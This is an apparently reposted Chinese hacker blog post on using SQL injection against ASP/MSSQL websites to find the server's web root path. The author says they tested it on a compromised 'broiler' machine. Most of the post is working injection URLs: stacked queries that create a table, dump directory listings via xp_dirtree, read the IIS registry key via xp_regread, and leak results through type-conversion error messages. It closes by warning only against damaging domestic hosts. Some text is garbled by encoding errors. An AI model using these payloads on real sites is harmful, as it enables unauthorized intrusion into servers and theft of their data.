SQL注入路徑問題作者孤光劍隱

下午沒什麼事情

看了看angel寫乙個路徑的問章　找了肉雞試了半天

費了牛勁了

我發現如果出現

microsoft ole db provider for sql server 錯誤 '80040e07'

將 varchar 值 '#sharedobjects' 轉換為資料型別為 int 的列時發生語法錯誤。

/html/showdetail_new.asp，行 9

這樣他的方法就不能用了

#必須給遮蔽掉

要飯的得到路徑的方法　偶也試了更是費勁啊

看看其中一句　我暈~

我要暈了

angel方法手工猜解管理後台路徑的成功機率很低，要用xp_dirtree來得到我們想要的資訊，下面的方法或許要簡單一點！第

一次公布出來，或許很多朋友在用，不過絕對非常好！我們把路徑寫到表裡去！

語句：http://http://.***xx.***/down/list.asp?id=1;create table dirs(paths varchar(100), id int)--

返回：正常的資訊！說明建表成功！繼續！

語句：http://http://.***xx.***/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'c:/'--

返回：正常資訊。說明寫入c盤的所有目錄成功了！爽！接下來就是取表了！暴它出來。

語句：http://http://.***xx.***/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-

返回：microsoft ole db provider for sql server 錯誤 '80040e07'

將 varchar 值 '@i***pub' 轉換為資料型別為 int 的列時發生語法錯誤。

再依次爆出表中的目錄名稱！

語句：http://http://.***xx.***/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in('@i***pub'))--

最後用同樣的方法測試得到網頁目錄放在e:/web下

臭要飯寫的!

1.怎麼拿到web絕對路徑？

呵呵？這個問題，花了我很長時間去研究。大家都知道ms的東西很多都放在登錄檔中的，web位置我們可以在註冊?br />碇械玫劍恢萌縵攏?br />hkey_local_machine/system/controlset001/services/w3svc/parameters/virtual roots

利用擴充套件儲存過程xp_regread我們可以取得它的值.

exec master.dbo.xp_regread 'hkey_local_machine',

'system/controlset001/services/w3svc/parameters/virtual roots', '/'

這樣，就取出來了，但問題又來了，取是取出來了，我們怎麼在ie中返回它的值呢？我的方法是：先建立乙個臨時

表，表中加一欄位，型別為：char 255。呵呵，用它來儲存web絕對路徑的值。表建好後，我們就用讀取登錄檔的方法，把返回的值儲存在一變數中。

然後向新建的表中加入記錄（即變數的值）。這樣，路徑就寫入到了表中。提交：

declare @result varchar(255) exec master.dbo.xp_regread 'hkey_local_machine',

'system/controlset001/services/w3svc/parameters/virtual roots', '/', @result output insert into 臨時表 (臨時欄位名) values( @result );--

然後，我們再提交: 1=(select count(*) from 臨時表 where 臨時欄位名》1)

這樣ie報錯,就把剛才插進去的web路徑的值報出來了。我也試過直接用變數來報錯，讓ie返回變數的值，結果是失

敗的，所以就想到了建臨時表加資料進去的方法！最後我們再刪除剛建的臨時表。

不要破壞國內主機~lis0在此提醒

SQL注入路徑問題作者孤光劍隱

sql 注入問題

SQL注入問題

SQL注入問題

SQL注入路徑問題 作者 孤光劍隱

sql 注入問題

SQL注入問題

SQL注入問題

相關推薦

SQL注入路徑問題作者孤光劍隱